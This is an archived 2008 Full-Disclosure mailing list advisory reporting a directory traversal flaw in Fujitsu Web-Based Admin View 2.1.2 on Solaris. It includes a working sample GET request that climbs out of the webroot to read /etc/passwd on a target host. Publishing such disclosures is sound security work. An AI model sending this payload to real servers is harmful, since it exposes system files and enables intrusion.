full-disclosure-uk August 2008 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: [Full-disclosure] Fujitsu Web-Based Admin Vi

[Full-disclosure] Fujitsu Web-Based Admin View Directory Traversal Vulnerability

From: Deniz Cevik <Deniz.Cevik_at_nospam>
Date: Thu Aug 21 2008 - 13:34:00 GMT
To: <full-disclosure@lists.grok.org.uk>


Fujitsu Web-Based Admin View Directory Traversal Vulnerability  

Version: 2.1.2 on Solaris, Other versions may vulnerable  

Vulnerability: Directory Traversal  

Risk: Critical  

Description: Due to insufficient control of user inputs, Fujitsu Web-based admin view reveals content of files residing in folders other than webroot. This will allow an attacker to view arbitrary local files within the context of the web server.  

Sample Request:  

GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0

Host: target:8081  

Deniz CEVIK

www.intellectpro.com.tr  



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/